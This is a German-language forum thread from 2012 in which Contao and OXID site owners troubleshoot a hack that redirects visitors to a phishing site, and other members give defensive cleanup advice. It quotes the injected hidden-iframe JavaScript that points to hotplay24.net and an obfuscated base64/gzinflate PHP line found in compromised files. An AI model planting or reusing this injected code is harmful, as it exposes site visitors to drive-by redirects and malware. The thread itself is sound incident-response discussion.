Weiterleitungs-Hack

**locologan** · 17.01.2012, 09:40

Hallo alle miteinander!

Ich hoffe, ich bin hier im richtigen Unterbereich des Forums mit meinem Anliegen.

Habe bei einem Kunden vor Weihnachten Contao Open Source CMS 2.10.3 aufgesetzt und wollte nun mit der Befüllung der Seite weitermachen. Nun werde ich beim Aufrufen der Seite immer zu einer Phishing-Seite weitergeleitet. Im Quellcode habe ich auch folgendes entdeckt:

Code:

<script>var url = "http://hotplay24.net";if ((navigator.userAgent.toLowerCase().indexOf("msie") >= 0) || (navigator.userAgent.toLowerCase().indexOf("firefox") >= 0)){   var f = document.createElement('iframe');   f.setAttribute("width", "1");   f.setAttribute("height", "1");   f.setAttribute("src", url);   f.setAttribute("style", "visibility: hidden; position: absolute; left: 0pt; top: 0pt;");   document.getElementsByTagName("body")[0].appendChild(f);}</script>

Jetzt frage ich mich, wie es dazu kommen kann? Contao-Version war vor Weihnachten aktuell, Passwörter sind nur mir bekannt und bestehen nicht nur aus "123" oder Ähnlichem. Kann es auch sein, dass der Server, auf dem die Seite liegt, gehackt wurde?

Was kann ich nun unternehmen, um die Seite zu retten bzw. die Weiterleitung herauszubekommen?

Als Erweiterung ist lediglich "dlh_googlemaps" installiert.

Vielen Dank schon mal im Voraus für Eure Hilfe!

MfG locologan

**BugBuster** · 17.01.2012, 09:50

Mittels Contao Check Tool prüfen, welche Dateien manipuliert wurden und ersetzen.
Die config Dateien die persönliche Daten haben, per Hand durchsuchen: localconfig.php, dcaconfig.php, initconfig.php, langconfig.php

Kann es auch sein, dass der Server, auf dem die Seite liegt, gehackt wurde?

Ist zur vermuten, mir ist jedenfalls keine Security Problem bekannt mir Contao wodurch solche Manipulationen möglich sind.

Provider informieren! Zwecks Prüfung ob auch anderen Kunden betroffen sind, dazu diesen Code Schnippsel aufheben und als Beispiel liefern.

**BugBuster** · 17.01.2012, 09:54

Von den installierten Erweiterungen die Templates überprüfen, falls vorhanden auch im Verzeichnis /templates.

Wenn du ssh Zugang auf den Server hast und das ein Linux ist, kannste auch versuchen per Kommandozeile zu suchen in welcher Datei der schmutz ist.
(der übrigens für IE Nutzer gefährlich ist!)

Code:

grep -i -r -l hotplay24 *

(wenn ich mich nicht irre)

**jan.theofel** · 17.01.2012, 14:28

Hi,

mach am besten auch einen Dump der Datenbank und schau da nach der URL. Wenn die da auftaucht hat doch entweder jemand deine Passwörter (Trojaner auf deinem Rechner, ohne SSL über ein offenes WLAN eingeloggt, etc.), das mySQL-Passwort könnte unsicher sein oder aber der Provider schützt seine Kundendomains nicht ausreichend gegeneinander, so das man die Dateien (und damit die localconfig.php und damit das mySQL-Passwort) der anderen Kunden auf dem selben Server auslesen kann...

Jan

***lucina*** · 17.01.2012, 14:43

Zitat von BugBuster

Code:

grep -i -r -l hotplay24 *

(wenn ich mich nicht irre)

Das wird vielleicht funktionieren, ist jedoch trotzdem keine gute Idee, weil das auch codiert sein kann und damit nur schwer zu finden ist.

Ich würde an Deiner Stelle das ganze

untersuchen, um den Weg des Eindringens zu verstehen
danach alle Daten löschen
die Datenbank löschen
beides aus einem Backup zurückspielen, von dem Du weißt, dass er nicht kompromittiert ist

Und Jan hat schon das Thema Passwörter erwähnt: ändere sie. Ausnahmslos.

Carolina.

**simulator** · 18.01.2012, 16:08

Hallo,
auch bei mir dieser seltsame Hack mit der Weiterleitung.
Bei Chrome und Opera kein Fehler.

Hat schon jemand rausbekommen woran es liegt,
bzw. gelöst, ohne das System neu aufzuspielen?

**locologan** · 19.01.2012, 09:14

Hallo alle miteinander!

Zuerst einmal vielen Dank für die zahlreichen Antworten!

Habe die Sache an den Provider weitergeleitet - leider steht seine Antwort noch aus. Daher warte ich jetzt noch ab, bevor ich an dem Projekt weitermache.

Das Check-Tool habe ich ausgeführt und es sind schätzungsweise 100-200 Dateien korrupt. Daher werde ich wohl um ein komplett neues Aufspielen (inkl. neuer Passwörter) nicht drumrum kommen.

Kann es eventuell auch mit dem Theme zu tun haben, welches ich für dieses Projekt verwende? Unter www.contao-theme.de habe ich mir das Theme "k0007" (Feuerwehr Musterstadt) heruntergeladen.

Danke und viele Grüße

Locologan

**schman** · 19.01.2012, 09:35

Das bezweifle ich eigentlich sehr stark. Da die Seite von fruitmedia betrieben wird. Diese sind Contao Partner.

***xchs*** · 19.01.2012, 10:07

Zitat von locologan

Das Check-Tool habe ich ausgeführt und es sind schätzungsweise 100-200 Dateien korrupt.

Kontrolliere nochmals, ob Du auch wirklich die richtige (d.h. zur Contao-Installation passende) Version des Contao-Checks verwendet hast!

http://de.contaowiki.org/Systemdiagnosetool

***Nina*** · 19.01.2012, 10:24

@loclogan und @simulator:

Bitte gebt mal folgende Infos:

- Welche Version hat euer Contao
- Welche Extensions sind installiert
- Wenn ihr ein kostenloses Theme installiert habt, dann welches *
- Bei welchem Webhoster liegt die Seite
- Schaut euch mal die betroffenen PHP-Dateien an und postet hier am besten direkt den problematischen Abschnitt wie er im PHP drin steht.
- Habt ihr mit eurem Webhoster schon Kontakt aufgenommen und was sagt er dazu.

Ich denke, so können wir am schnellsten die Ursache finden.

Persönlich tippe ich auf Problem beim Webhoster oder unsicheren PC des Nutzers. Meist liegt es an einem dieser beiden Punkte. Bei letzterem reicht es z. B. wenn man sich über ein öffentliches WLAN ungeschützt einloggt. So können Unbefugte dann einfach die Passwörter "aus der Luft mitlesen" (bildlich gesprochen). Oder man hat auf dem PC einen Keylogger oder sonst sowas.

* Das Feuerwehr-Theme habe ich mir angesehen und konnte darin nix ungewöhnliches entdecken.

**donfalcone** · 19.01.2012, 15:46

Hallo, bin auch betroffen allerdings im OXID CE.

In dieversen PHP Dokumenten steht der folgende Code:

Code:

echo(gzinflate(base64_decode("lZFBa8MwDIX/ivClNoy0GzslbaEtu43tstvYwYnlWODGxlbahnX/fQntdiqD3STe+5CetMxNosjrg07QJw8rEI45lvO5Cxy9Hh4eiw5ZVGRByk4fqNUcUtFnTJsWOy44PIcjpp3OKFVBncHTq5VinwmFgvUKFgrOZ/gPaymhDacfXH0CwLSgHdczoen3E9sk1IxPHqdOzsgmvceZqkavLTLyhjlR3TNKcSTDTtyBuBc3dYfUOv7DkFMzquN9bqs8eJzoA2WqyRMPJTgyBrsKYsjEFLoSdJ2DH4EKPFouYRG5Ag7xUl0G/6Zrka/R8nZ40+3LGE6KOphBqPfFR6FjxM7sHHkjraq+lvPrI78B")));

In dem Script liegt codiert derobige JS Quelltext. Durchsuche gerade alle PHP Dateien im Projekt.

In diversen Ordnern liegt auch eine supekte Datei, mit dem datum von heute: phdinfo.php

Grüße
Falko

**donfalcone** · 19.01.2012, 16:06

Der im selben Webordner liegende phpmyadmin ist auch betroffen. Scheinbar wird der Code in Dateien eingeschleusst die oft so benannt sind wie

z.B:

main.php
index.php
config.inc.php

usw.

***lucina*** · 19.01.2012, 16:30

PHPmyAdmin ist Deins? Ich wundere mich gerade.

Grundsätzlich würde ich sowas nicht öffentlich herumliegen lassen, und in der Regel stellt ein Hoster das ja auch (mehr oder weniger abgesichert) zur Verfügung. Wenn *da* jemand drin war und die Executables geändert hat, dann hat der Hoster ein richtiges Problem.

Carolina.